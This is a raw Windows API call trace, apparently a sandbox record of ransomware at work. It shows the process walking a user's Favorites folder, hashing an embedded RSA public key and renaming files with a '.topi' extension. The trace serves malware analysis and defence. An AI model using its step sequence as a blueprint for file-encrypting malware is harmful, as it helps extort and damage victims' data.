(HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0096.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0096.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02630 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.251] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02630 | out: hHeap=0x680000) returned 1 [0096.251] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.252] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.252] PathFindFileNameW (pszPath="") returned="" [0096.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.252] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0096.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.252] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.252] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0096.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3ff8 [0096.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.252] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0096.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.252] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0096.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.252] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0096.252] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.257] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=236) returned 1 [0096.257] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.260] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.260] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.261] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.261] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xec, lpOverlapped=0x0) returned 1 [0096.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.261] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.261] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.262] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.262] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.262] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.262] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.262] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.262] GetLastError () returned 0x0 [0096.262] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.262] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.263] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.263] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.263] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.263] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.263] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.263] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.263] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.topi")) returned 1 [0096.264] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.264] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.264] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.265] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.266] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0096.266] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0096.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.266] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=226) returned 1 [0096.266] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.269] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.270] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.271] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.271] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.272] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.272] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.272] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.272] GetLastError () returned 0x0 [0096.272] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.272] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.272] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.272] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.272] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe0) returned 0x3199338 [0096.273] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.273] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02678 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9858 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a026c0 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9870 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98a0 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98b8 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.274] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98a0 | out: hHeap=0x680000) returned 1 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98b8 | out: hHeap=0x680000) returned 1 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98b8 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d98a0 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98b8 | out: hHeap=0x680000) returned 1 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98a0 | out: hHeap=0x680000) returned 1 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.275] GetCurrentThreadId () returned 0x8c4 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7a40 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 